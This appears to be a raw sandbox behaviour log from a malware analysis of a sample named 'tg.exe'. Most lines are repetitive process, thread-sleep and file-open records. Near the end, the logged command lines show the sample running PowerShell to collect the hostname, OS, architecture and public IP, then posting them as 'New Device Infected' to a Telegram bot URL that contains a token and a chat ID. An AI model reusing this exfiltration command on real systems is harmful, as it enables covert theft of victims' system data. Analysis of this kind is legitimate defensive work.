Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\tg.exe	Window / User API: threadDelayed 9604	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Window / User API: threadDelayed 388	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4832	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1791	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3222	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4100	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1443	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1779	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1718	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5004	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4801	Jump to behavior

Source: C:\Users\user\Desktop\tg.exe TID: 7516	Thread sleep count: 9604 > 30	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe TID: 7516	Thread sleep time: -240100s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe TID: 7516	Thread sleep count: 388 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676	Thread sleep count: 4832 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676	Thread sleep count: 1791 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820	Thread sleep count: 3222 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824	Thread sleep count: 4100 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964	Thread sleep count: 1443 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960	Thread sleep count: 322 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056	Thread sleep count: 1779 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148	Thread sleep count: 1718 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7204	Thread sleep count: 5004 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208	Thread sleep count: 4801 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7260	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\tg.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\tg.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\tg.exe

Thread sleep count: Count: 9604 delay: -25

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\tg.exe	File opened: C:\Users\user\AppData\Local\Temp\D272.tmp	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	File opened: C:\Users\user\AppData\Local\Temp\D272.tmp\D273.tmp\D274.tmp	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	File opened: C:\Users\user\AppData\Local\Temp\D272.tmp\D273.tmp	Jump to behavior

Source: powershell.exe, 0000000D.00000002.1810723028.000001F2CA4D4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\tg.exe

Code function: 0_2_0040A83A LoadLibraryW,GetProcAddress,wcscpy,wcscat,wcslen,CoTaskMemFree,FreeLibrary,wcscat,wcslen,

0_2_0040A83A

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\tg.exe	Code function: 0_2_00409950 SetUnhandledExceptionFilter,		0_2_00409950
Source: C:\Users\user\Desktop\tg.exe	Code function: 0_2_00409930 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,		0_2_00409930

Source: C:\Users\user\Desktop\tg.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D272.tmp\D273.tmp\D274.bat C:\Users\user\Desktop\tg.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "$env:COMPUTERNAME"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "[System.Environment]::OSVersion"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage' -Method POST -Body @{chat_id='6734985705' ; text=' @New Device Infected!!!, Information: Date: 2024-12-22 19:12:07, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189'}"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$env:COMPUTERNAME"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "[System.Environment]::OSVersion"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7879910740:aaempll82moqqk9txwsc5yk5uz56ixr0bzq/sendmessage' -method post -body @{chat_id='6734985705' ; text=' @new device infected!!!, information: date: 2024-12-22 19:12:07, hostname: user-pc, os: win32nt 10.0.19045.0 microsoft windows nt 10.0.19045.0, architecture: 64-bit, public ip: 8.46.123.189'}"
